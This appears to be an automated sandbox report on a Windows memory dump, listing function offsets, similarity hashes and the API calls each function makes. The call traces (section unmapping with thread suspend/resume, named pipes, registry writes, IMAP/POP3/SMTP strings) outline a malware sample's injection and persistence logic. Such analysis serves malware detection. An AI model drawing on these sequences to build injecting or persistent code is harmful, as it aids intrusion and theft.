  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
